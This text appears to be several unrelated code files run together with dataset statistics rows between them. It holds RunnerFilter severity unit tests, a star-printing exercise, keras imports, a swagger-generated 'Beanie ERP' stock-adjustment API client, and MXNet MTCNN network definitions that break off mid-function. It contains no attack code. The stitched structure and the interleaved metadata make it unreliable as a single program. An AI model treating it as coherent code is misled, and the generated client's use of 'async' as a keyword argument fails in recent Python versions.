self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789'))
def test_skip_sev_no_check_sev(self):
instance = RunnerFilter(skip_checks=['HIGH'])
# if a skip check severity is used, run any check without it
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789'))
def test_skip_sev_no_check_sev_with_id(self):
instance = RunnerFilter(skip_checks=['HIGH', 'CKV_AWS_789'])
# if a skip check severity is used, run any check without it
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789'))
def test_run_sev_id_2(self):
instance = RunnerFilter(checks=['CKV_AWS_123'], skip_checks=['MEDIUM'])
# Run AWS_123, unless it is MEDIUM or below
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.CRITICAL]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.HIGH]))
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.CRITICAL]))
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.HIGH]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.MEDIUM]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.LOW]))
def test_run_two_sev_1(self):
instance = RunnerFilter(checks=['MEDIUM'], skip_checks=['HIGH'])
# run medium and higher, skip high and lower; skip takes priority
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.HIGH]))
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.CRITICAL]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.LOW]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.MEDIUM]))
def test_run_two_sev_2(self):
instance = RunnerFilter(checks=['HIGH'], skip_checks=['MEDIUM'])
# run HIGH and higher, skip MEDIUM and lower (so just run HIGH or higher)
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.HIGH]))
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.CRITICAL]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.LOW]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.MEDIUM]))
def test_run_sev_explicit(self):
instance = RunnerFilter(checks=['MEDIUM', 'CKV_AWS_789'])
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.LOW]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.LOW]))
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.HIGH]))
def test_skip_sev_explicit(self):
instance = RunnerFilter(skip_checks=['MEDIUM', 'CKV_AWS_789'])
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789', severity=Severities[BcSeverities.HIGH]))
self.assertFalse(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.LOW]))
self.assertTrue(instance.should_run_check(check_id='CKV_AWS_123', severity=Severities[BcSeverities.HIGH]))
def test_within_threshold(self):
instance = RunnerFilter(checks=['LOW'])
self.assertTrue(instance.within_threshold(Severities[BcSeverities.LOW]))
self.assertTrue(instance.within_threshold(Severities[BcSeverities.MEDIUM]))
instance = RunnerFilter(checks=['HIGH'])
self.assertFalse(instance.within_threshold(Severities[BcSeverities.LOW]))
self.assertFalse(instance.within_threshold(Severities[BcSeverities.MEDIUM]))
instance = RunnerFilter(skip_checks=['HIGH'])
self.assertFalse(instance.within_threshold(Severities[BcSeverities.LOW]))
self.assertFalse(instance.within_threshold(Severities[BcSeverities.MEDIUM]))
instance = RunnerFilter(skip_checks=['LOW'])
self.assertFalse(instance.within_threshold(Severities[BcSeverities.LOW]))
self.assertTrue(instance.within_threshold(Severities[BcSeverities.MEDIUM]))
instance = RunnerFilter(checks=['HIGH'], skip_checks=['LOW'])
self.assertFalse(instance.within_threshold(Severities[BcSeverities.LOW]))
self.assertFalse(instance.within_threshold(Severities[BcSeverities.MEDIUM]))
self.assertTrue(instance.within_threshold(Severities[BcSeverities.HIGH]))
if __name__ == '__main__':
unittest.main()
| 53.62931 | 119 | 0.745111 | 2,336 | 18,663 | 5.60488 | 0.059503 | 0.073551 | 0.084473 | 0.120981 | 0.924311 | 0.887726 | 0.84717 | 0.789659 | 0.753532 | 0.719698 | 0 | 0.017106 | 0.147993 | 18,663 | 347 | 120 | 53.783862 | 0.806301 | 0.052242 | 0 | 0.505837 | 0 | 0 | 0.078282 | 0 | 0 | 0 | 0 | 0 | 0.36965 | 1 | 0.233463 | false | 0 | 0.070039 | 0 | 0.307393 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bed8220415ade7aedc4542f817d716dc1adfed03 | 143 | py | Python | question_src/question4.py | kwonbosung02/PythonCoding | 8ae9a21c1d80102a14b582b2581cf3f0baed8786 | [
"MIT"
] | 5 | 2019-04-24T05:13:31.000Z | 2020-07-13T04:57:54.000Z | question_src/question4.py | kwonbosung02/PythonCoding | 8ae9a21c1d80102a14b582b2581cf3f0baed8786 | [
"MIT"
] | null | null | null | question_src/question4.py | kwonbosung02/PythonCoding | 8ae9a21c1d80102a14b582b2581cf3f0baed8786 | [
"MIT"
] | null | null | null |
#문제 1
a = int(input())
for i in range(a+1):
print(i*"*")
#문제 2
a = int(input())
for i in range(a+1):
print((a-i)*" " + (2*i-1)*"*")
| 11.916667 | 34 | 0.461538 | 30 | 143 | 2.2 | 0.366667 | 0.121212 | 0.272727 | 0.363636 | 0.818182 | 0.818182 | 0.818182 | 0.818182 | 0.818182 | 0.818182 | 0 | 0.055046 | 0.237762 | 143 | 11 | 35 | 13 | 0.550459 | 0.055944 | 0 | 0.666667 | 0 | 0 | 0.022727 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
834a98f3b870a52b44e7e3ca6e46d73152795911 | 238 | py | Python | keras_text_cls/model/__init__.py | titicaca/keras-text-cls | de1d70e64946cae2da06bda46b9ebace2b0b4f00 | [
"MIT"
] | 3 | 2019-03-01T15:50:12.000Z | 2021-05-03T15:08:10.000Z | keras_text_cls/model/__init__.py | titicaca/keras-text-cls | de1d70e64946cae2da06bda46b9ebace2b0b4f00 | [
"MIT"
] | null | null | null | keras_text_cls/model/__init__.py | titicaca/keras-text-cls | de1d70e64946cae2da06bda46b9ebace2b0b4f00 | [
"MIT"
] | 1 | 2020-08-08T02:53:56.000Z | 2020-08-08T02:53:56.000Z | from keras_text_cls.model.text_mlp import *
from keras_text_cls.model.text_cnn import *
from keras_text_cls.model.text_rcnn import *
from keras_text_cls.model.text_han import *
from keras_text_cls.model.utils import pad_text_indices
| 39.666667 | 56 | 0.836134 | 42 | 238 | 4.357143 | 0.309524 | 0.245902 | 0.355191 | 0.437158 | 0.79235 | 0.79235 | 0.508197 | 0 | 0 | 0 | 0 | 0 | 0.105042 | 238 | 5 | 57 | 47.6 | 0.859155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
55ccf2b467ec7b0031a39e1b9563dc0bad427754 | 12,632 | py | Python | beanie/api/stock_adjustment_api.py | altoyield/python-beanieclient | 448b8dd328054eaf32dd7d0bdff700e603b5c27d | [
"Apache-2.0"
] | null | null | null | beanie/api/stock_adjustment_api.py | altoyield/python-beanieclient | 448b8dd328054eaf32dd7d0bdff700e603b5c27d | [
"Apache-2.0"
] | null | null | null | beanie/api/stock_adjustment_api.py | altoyield/python-beanieclient | 448b8dd328054eaf32dd7d0bdff700e603b5c27d | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Beanie ERP API
An API specification for interacting with the Beanie ERP system # noqa: E501
OpenAPI spec version: 0.8
Contact: dev@bean.ie
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from beanie.api_client import ApiClient
class StockAdjustmentApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_stock_adjustment(self, stock_adjustments, **kwargs): # noqa: E501
"""add_stock_adjustment # noqa: E501
Creates a new stock adjustment in the system # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_stock_adjustment(stock_adjustments, async=True)
>>> result = thread.get()
:param async bool
:param StockAdjustmentInput stock_adjustments: Stock adjustment to add to the system (required)
:return: StockAdjustment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.add_stock_adjustment_with_http_info(stock_adjustments, **kwargs) # noqa: E501
else:
(data) = self.add_stock_adjustment_with_http_info(stock_adjustments, **kwargs) # noqa: E501
return data
def add_stock_adjustment_with_http_info(self, stock_adjustments, **kwargs): # noqa: E501
"""add_stock_adjustment # noqa: E501
Creates a new stock adjustment in the system # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_stock_adjustment_with_http_info(stock_adjustments, async=True)
>>> result = thread.get()
:param async bool
:param StockAdjustmentInput stock_adjustments: Stock adjustment to add to the system (required)
:return: StockAdjustment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['stock_adjustments'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_stock_adjustment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'stock_adjustments' is set
if ('stock_adjustments' not in params or
params['stock_adjustments'] is None):
raise ValueError("Missing the required parameter `stock_adjustments` when calling `add_stock_adjustment`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'stock_adjustments' in params:
body_params = params['stock_adjustments']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/stock_adjustments', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StockAdjustment', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def find_stock_adjustment_by_id(self, id, **kwargs): # noqa: E501
"""Find Stock adjustment by ID # noqa: E501
Returns a single stock adjustment if the user has access # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.find_stock_adjustment_by_id(id, async=True)
>>> result = thread.get()
:param async bool
:param int id: ID of stock adjustment to fetch (required)
:return: StockAdjustment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.find_stock_adjustment_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.find_stock_adjustment_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def find_stock_adjustment_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Find Stock adjustment by ID # noqa: E501
Returns a single stock adjustment if the user has access # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.find_stock_adjustment_by_id_with_http_info(id, async=True)
>>> result = thread.get()
:param async bool
:param int id: ID of stock adjustment to fetch (required)
:return: StockAdjustment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method find_stock_adjustment_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `find_stock_adjustment_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/stock_adjustments/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StockAdjustment', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def find_stock_adjustments(self, **kwargs): # noqa: E501
"""All stock adjustment # noqa: E501
Returns all stock adjustment from the system that the user has access to # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.find_stock_adjustments(async=True)
>>> result = thread.get()
:param async bool
:param list[str] tags: tags to filter by
:param int limit: Maximum number of results to return
:return: list[StockAdjustment]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.find_stock_adjustments_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.find_stock_adjustments_with_http_info(**kwargs) # noqa: E501
return data
def find_stock_adjustments_with_http_info(self, **kwargs): # noqa: E501
"""All stock adjustment # noqa: E501
Returns all stock adjustment from the system that the user has access to # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.find_stock_adjustments_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param list[str] tags: tags to filter by
:param int limit: Maximum number of results to return
:return: list[StockAdjustment]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['tags', 'limit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method find_stock_adjustments" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'tags' in params:
query_params.append(('tags', params['tags'])) # noqa: E501
collection_formats['tags'] = 'csv' # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/stock_adjustments', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[StockAdjustment]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 37.933934 | 132 | 0.615421 | 1,454 | 12,632 | 5.110041 | 0.117607 | 0.052759 | 0.022611 | 0.029071 | 0.889502 | 0.869044 | 0.842127 | 0.823688 | 0.797577 | 0.795962 | 0 | 0.017451 | 0.296865 | 12,632 | 332 | 133 | 38.048193 | 0.819072 | 0.061431 | 0 | 0.71345 | 1 | 0 | 0.169369 | 0.045077 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.023392 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
55d3d6012a62e8563637d62d38829ea5c4916a0d | 20,339 | py | Python | train-mtcnn-zq-mxnet/core/symbol.py | zzzkk2009/anti-spoofing | ac3992547c430619e236b338575109d7ecbba654 | [
"MIT"
] | 13 | 2018-12-19T07:43:46.000Z | 2020-06-30T13:10:08.000Z | train-mtcnn-zq-mxnet/core/symbol.py | zzzkk2009/anti-spoofing | ac3992547c430619e236b338575109d7ecbba654 | [
"MIT"
] | 1 | 2020-04-28T02:18:29.000Z | 2020-04-28T02:18:29.000Z | train-mtcnn-zq-mxnet/core/symbol.py | zzzkk2009/anti-spoofing | ac3992547c430619e236b338575109d7ecbba654 | [
"MIT"
] | 5 | 2018-12-19T07:43:48.000Z | 2020-06-15T12:14:41.000Z | import mxnet as mx
import negativemining
import negativemining_landmark
import negativemining_onlylandmark
from config import config
def P_Net20(mode='train'):
"""
#Proposal Network
#input shape 3 x 20 x 20
"""
data = mx.symbol.Variable(name="data")
bbox_target = mx.symbol.Variable(name="bbox_target")
label = mx.symbol.Variable(name="label")
conv1 = mx.symbol.Convolution(data=data, kernel=(3, 3), stride=(2,2), num_filter=8, name="conv1", no_bias=True)
bn1 = mx.sym.BatchNorm(data=conv1, name='bn1', fix_gamma=False,momentum=0.9)
prelu1 = mx.symbol.LeakyReLU(data=bn1, act_type="prelu", name="prelu1")
#cur size: 9x9
conv2_dw = mx.symbol.Convolution(data=prelu1, kernel=(3, 3), num_filter=8, num_group=8, name="conv2_dw", no_bias=True)
bn2_dw = mx.sym.BatchNorm(data=conv2_dw, name='bn2_dw', fix_gamma=False,momentum=0.9)
prelu2_dw = mx.symbol.LeakyReLU(data=bn2_dw, act_type="prelu", name="prelu2_dw")
conv2_sep = mx.symbol.Convolution(data=prelu2_dw, kernel=(1, 1), num_filter=16, name="conv2_sep", no_bias=True)
bn2_sep = mx.sym.BatchNorm(data=conv2_sep, name='bn2_sep', fix_gamma=False,momentum=0.9)
prelu2 = mx.symbol.LeakyReLU(data=bn2_sep, act_type="prelu", name="prelu2")
#cur size: 7x7
conv3_dw = mx.symbol.Convolution(data=prelu2, kernel=(3, 3),stride=(2,2), num_filter=16, num_group=16, name="conv3_dw", no_bias=True)
bn3_dw = mx.sym.BatchNorm(data=conv3_dw, name='bn3_dw', fix_gamma=False,momentum=0.9)
prelu3_dw = mx.symbol.LeakyReLU(data=bn3_dw, act_type="prelu", name="prelu3_dw")
conv3_sep = mx.symbol.Convolution(data=prelu3_dw, kernel=(1, 1), num_filter=24, name="conv3_sep", no_bias=True)
bn3_sep = mx.sym.BatchNorm(data=conv3_sep, name='bn3_sep', fix_gamma=False,momentum=0.9)
prelu3 = mx.symbol.LeakyReLU(data=bn3_sep, act_type="prelu", name="prelu3")
#cur size: 3x3
conv4_dw = mx.symbol.Convolution(data=prelu3, kernel=(3, 3), num_filter=24, num_group=24, name="conv4_dw", no_bias=True)
bn4_dw = mx.sym.BatchNorm(data=conv4_dw, name='bn4_dw', fix_gamma=False,momentum=0.9)
prelu4_dw = mx.symbol.LeakyReLU(data=bn4_dw, act_type="prelu", name="prelu4_dw")
#cur size: 1x1
conv4_1 = mx.symbol.Convolution(data=prelu4_dw, kernel=(1, 1), num_filter=2, name="conv4_1")
conv4_2 = mx.symbol.Convolution(data=prelu4_dw, kernel=(1, 1), num_filter=4, name="conv4_2")
if mode == 'test':
cls_prob = mx.symbol.SoftmaxActivation(data=conv4_1, mode="channel", name="cls_prob")
bbox_pred = conv4_2
group = mx.symbol.Group([cls_prob, bbox_pred])
else:
conv4_1_reshape = mx.symbol.Reshape(data = conv4_1, shape=(-1, 2), name="conv4_1_reshape")
cls_prob = mx.symbol.SoftmaxOutput(data=conv4_1_reshape, label=label,
multi_output=True, use_ignore=True,
name="cls_prob")
conv4_2_reshape = mx.symbol.Reshape(data = conv4_2, shape=(-1, 4), name="conv4_2_reshape")
bbox_pred = mx.symbol.LinearRegressionOutput(data=conv4_2_reshape, label=bbox_target,
grad_scale=1, name="bbox_pred")
out = mx.symbol.Custom(cls_prob=cls_prob, label=label, bbox_pred=bbox_pred,bbox_target=bbox_target,
op_type='negativemining', name="negative_mining")
group = mx.symbol.Group([out])
return group
def R_Net(mode='train'):
"""
Refine Network
input shape 3 x 24 x 24
"""
data = mx.symbol.Variable(name="data")
bbox_target = mx.symbol.Variable(name="bbox_target")
label = mx.symbol.Variable(name="label")
conv1 = mx.symbol.Convolution(data=data, kernel=(3, 3), pad=(1,1), num_filter=16, name="conv1", no_bias=True)
bn1 = mx.sym.BatchNorm(data=conv1, name='bn1', fix_gamma=False,momentum=0.9)
prelu1 = mx.symbol.LeakyReLU(data=bn1, act_type="prelu", name="prelu1")
conv2_dw = mx.symbol.Convolution(data=prelu1, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=16, num_group=16, name="conv2_dw", no_bias=True)
bn2_dw = mx.sym.BatchNorm(data=conv2_dw, name='bn2_dw', fix_gamma=False,momentum=0.9)
prelu2_dw = mx.symbol.LeakyReLU(data=bn2_dw, act_type="prelu", name="prelu2_dw")
conv2_sep = mx.symbol.Convolution(data=prelu2_dw, kernel=(1, 1), num_filter=32, name="conv2_sep", no_bias=True)
bn2_sep = mx.sym.BatchNorm(data=conv2_sep, name='bn2_sep', fix_gamma=False,momentum=0.9)
prelu2 = mx.symbol.LeakyReLU(data=bn2_sep, act_type="prelu", name="prelu2")
conv3_dw = mx.symbol.Convolution(data=prelu2, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=32, num_group=32, name="conv3_dw", no_bias=True)
bn3_dw = mx.sym.BatchNorm(data=conv3_dw, name='bn3_dw', fix_gamma=False,momentum=0.9)
prelu3_dw = mx.symbol.LeakyReLU(data=bn3_dw, act_type="prelu", name="prelu3_dw")
conv3_sep = mx.symbol.Convolution(data=prelu3_dw, kernel=(1, 1), num_filter=64, name="conv3_sep", no_bias=True)
bn3_sep = mx.sym.BatchNorm(data=conv3_sep, name='bn3_sep', fix_gamma=False,momentum=0.9)
prelu3 = mx.symbol.LeakyReLU(data=bn3_sep, act_type="prelu", name="prelu3")
conv4_dw = mx.symbol.Convolution(data=prelu3, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=64, num_group=64, name="conv4_dw", no_bias=True)
bn4_dw = mx.sym.BatchNorm(data=conv4_dw, name='bn4_dw', fix_gamma=False,momentum=0.9)
prelu4_dw = mx.symbol.LeakyReLU(data=bn4_dw, act_type="prelu", name="prelu4_dw")
conv4_sep = mx.symbol.Convolution(data=prelu4_dw, kernel=(1, 1), num_filter=128, name="conv4_sep", no_bias=True)
bn4_sep = mx.sym.BatchNorm(data=conv4_sep, name='bn4_sep', fix_gamma=False,momentum=0.9)
prelu4 = mx.symbol.LeakyReLU(data=bn4_sep, act_type="prelu", name="prelu4")
conv5_dw = mx.symbol.Convolution(data=prelu4, kernel=(3, 3), num_filter=128, num_group=128, name="conv5_dw", no_bias=True)
bn5_dw = mx.sym.BatchNorm(data=conv5_dw, name='bn5_dw', fix_gamma=False,momentum=0.9)
prelu5_dw = mx.symbol.LeakyReLU(data=bn5_dw, act_type="prelu", name="prelu5_dw")
conv5_1 = mx.symbol.FullyConnected(data=prelu5_dw, num_hidden=2, name="conv5_1")
conv5_2 = mx.symbol.FullyConnected(data=prelu5_dw, num_hidden=4, name="conv5_2")
cls_prob = mx.symbol.SoftmaxOutput(data=conv5_1, label=label, use_ignore=True,
name="cls_prob")
if mode == 'test':
cls_prob = mx.symbol.SoftmaxOutput(data=conv5_1, label=label, use_ignore=True, name="cls_prob")
bbox_pred = conv5_2
group = mx.symbol.Group([cls_prob, bbox_pred])
else:
bbox_pred = mx.symbol.LinearRegressionOutput(data=conv5_2, label=bbox_target,
grad_scale=1, name="bbox_pred")
out = mx.symbol.Custom(cls_prob=cls_prob, label=label, bbox_pred=bbox_pred, bbox_target=bbox_target,
op_type='negativemining', name="negative_mining")
group = mx.symbol.Group([out])
return group
def O_Net(mode="train", with_landmark = False):
"""
Refine Network
input shape 3 x 48 x 48
"""
data = mx.symbol.Variable(name="data")
bbox_target = mx.symbol.Variable(name="bbox_target")
label = mx.symbol.Variable(name="label")
if with_landmark:
type_label = mx.symbol.Variable(name="type_label")
landmark_target = mx.symbol.Variable(name="landmark_target")
conv1 = mx.symbol.Convolution(data=data, kernel=(3, 3),pad=(1,1), num_filter=32, name="conv1")
bn1 = mx.sym.BatchNorm(data=conv1, name='bn1', fix_gamma=False,momentum=0.9)
prelu1 = mx.symbol.LeakyReLU(data=bn1, act_type="prelu", name="prelu1")
conv2_dw = mx.symbol.Convolution(data=prelu1, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=32, num_group=32, name="conv2_dw", no_bias=True)
bn2_dw = mx.sym.BatchNorm(data=conv2_dw, name='bn2_dw', fix_gamma=False,momentum=0.9)
prelu2_dw = mx.symbol.LeakyReLU(data=bn2_dw, act_type="prelu", name="prelu2_dw")
conv2_sep = mx.symbol.Convolution(data=prelu2_dw, kernel=(1, 1), num_filter=64, name="conv2_sep", no_bias=True)
bn2_sep = mx.sym.BatchNorm(data=conv2_sep, name='bn2_sep', fix_gamma=False,momentum=0.9)
prelu2 = mx.symbol.LeakyReLU(data=bn2_sep, act_type="prelu", name="prelu2")
conv3_dw = mx.symbol.Convolution(data=prelu2, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=64, num_group=64, name="conv3_dw", no_bias=True)
bn3_dw = mx.sym.BatchNorm(data=conv3_dw, name='bn3_dw', fix_gamma=False,momentum=0.9)
prelu3_dw = mx.symbol.LeakyReLU(data=bn3_dw, act_type="prelu", name="prelu3_dw")
conv3_sep = mx.symbol.Convolution(data=prelu3_dw, kernel=(1, 1), num_filter=64, name="conv3_sep", no_bias=True)
bn3_sep = mx.sym.BatchNorm(data=conv3_sep, name='bn3_sep', fix_gamma=False,momentum=0.9)
prelu3 = mx.symbol.LeakyReLU(data=bn3_sep, act_type="prelu", name="prelu3")
conv4_dw = mx.symbol.Convolution(data=prelu3, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=64, num_group=64, name="conv4_dw", no_bias=True)
bn4_dw = mx.sym.BatchNorm(data=conv4_dw, name='bn4_dw', fix_gamma=False,momentum=0.9)
prelu4_dw = mx.symbol.LeakyReLU(data=bn4_dw, act_type="prelu", name="prelu4_dw")
conv4_sep = mx.symbol.Convolution(data=prelu4_dw, kernel=(1, 1), num_filter=128, name="conv4_sep", no_bias=True)
bn4_sep = mx.sym.BatchNorm(data=conv4_sep, name='bn4_sep', fix_gamma=False,momentum=0.9)
prelu4 = mx.symbol.LeakyReLU(data=bn4_sep, act_type="prelu", name="prelu4")
conv5_dw = mx.symbol.Convolution(data=prelu4, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=128, num_group=128, name="conv5_dw", no_bias=True)
bn5_dw = mx.sym.BatchNorm(data=conv5_dw, name='bn5_dw', fix_gamma=False,momentum=0.9)
prelu5_dw = mx.symbol.LeakyReLU(data=bn5_dw, act_type="prelu", name="prelu5_dw")
conv5_sep = mx.symbol.Convolution(data=prelu5_dw, kernel=(1, 1), num_filter=256, name="conv5_sep", no_bias=True)
bn5_sep = mx.sym.BatchNorm(data=conv5_sep, name='bn5_sep', fix_gamma=False,momentum=0.9)
prelu5 = mx.symbol.LeakyReLU(data=bn5_sep, act_type="prelu", name="prelu5")
conv6_dw = mx.symbol.Convolution(data=prelu5, kernel=(3, 3), num_filter=256, num_group=256, name="conv6_dw", no_bias=True)
bn6_dw = mx.sym.BatchNorm(data=conv6_dw, name='bn6_dw', fix_gamma=False,momentum=0.9)
prelu6_dw = mx.symbol.LeakyReLU(data=bn6_dw, act_type="prelu", name="prelu6_dw")
conv6_1 = mx.symbol.FullyConnected(data=prelu6_dw, num_hidden=2, name="conv6_1")
bn6_1 = mx.sym.BatchNorm(data=conv6_1, name='bn6_1', fix_gamma=False,momentum=0.9)
cls_prob = mx.symbol.SoftmaxOutput(data=bn6_1, label=label, use_ignore=True, name="cls_prob")
conv6_2 = mx.symbol.FullyConnected(data=prelu6_dw, num_hidden=4, name="conv6_2")
